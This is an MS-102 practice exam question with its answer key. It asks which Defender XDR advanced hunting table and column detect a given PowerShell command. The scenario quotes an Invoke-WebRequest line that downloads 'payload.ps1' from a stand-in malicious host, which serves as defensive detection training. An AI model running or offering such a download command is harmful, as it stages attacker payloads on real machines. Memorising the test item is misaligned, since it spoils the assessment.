Courseiva

MS-102 Practice Question: Manage security and threats by using Microsoft Defender XDR

You are a security administrator for Litware, Inc. The company uses Microsoft Defender XDR. You need to configure a custom detection rule that alerts when a user runs a specific PowerShell command on any device. The command is: `Invoke-WebRequest -Uri 'http://malicious.site/payload.ps1' -OutFile 'C:\temp\payload.ps1'`. Which advanced hunting table and column should you use to detect this activity?

⚠ Common exam trap

The trap here is assuming that network or file events are sufficient to detect a command execution, when in fact only process events capture the full command line.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

DeviceProcessEvents, using the ProcessCommandLine column.

To detect a specific PowerShell command execution, you need the process creation event that includes the full command line. DeviceProcessEvents is the dedicated table for process events in Microsoft Defender for Endpoint, and ProcessCommandLine holds the command-line arguments. Filtering on this column for the malicious URL or command pattern will accurately trigger the custom detection rule. Other tables either lack command-line data or are not designed for this purpose.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    DeviceEvents, using the AdditionalFields column.

    Why it's wrong here

    DeviceEvents is a generic table for various endpoint events, and AdditionalFields is a dynamic column that can contain extra event-specific data. While some process-related events might be logged here, the primary table for process creation with command lines is DeviceProcessEvents. Relying on AdditionalFields would be unreliable and not specifically designed for command-line detection. This approach would likely miss the event or require complex parsing, making it unsuitable for a precise custom detection rule.

  • ✗

    DeviceFileEvents, using the FileName column.

    Why it's wrong here

    DeviceFileEvents tracks file creation, modification, and deletion. The FileName column would only show the name of the file, such as 'payload.ps1', but not the command that created it. This would not distinguish between the malicious command and other legitimate downloads of the same file name. The scenario requires detecting the specific PowerShell command, so this table and column lack the necessary command-line context.

  • ✓

    DeviceProcessEvents, using the ProcessCommandLine column.

    Why this is correct

    DeviceProcessEvents records process creation events on devices, including the command line used to launch the process. The ProcessCommandLine column contains the full command line, which would include the PowerShell command with the malicious URL and output file path. This is the correct table and column to detect the execution of the specific PowerShell command. Filtering on ProcessCommandLine for the URL or the command pattern will trigger the alert as required.

  • ✗

    DeviceNetworkEvents, using the RemoteUrl column.

    Why it's wrong here

    DeviceNetworkEvents captures network connections, and RemoteUrl is a column that may contain the URL for HTTP connections. However, it does not record the command line that initiated the connection. The scenario requires detecting the execution of a specific PowerShell command, not just the network connection. While the command would generate a network event, using DeviceNetworkEvents would not capture the command line details, and the RemoteUrl might not include the full command context. Therefore, it is not the right choice.

About these practice questions

This MS-102 question is part of Courseiva's 712-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official Microsoft exam blueprint

This MS-102 practice question is part of Courseiva's free Microsoft certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the MS-102 exam.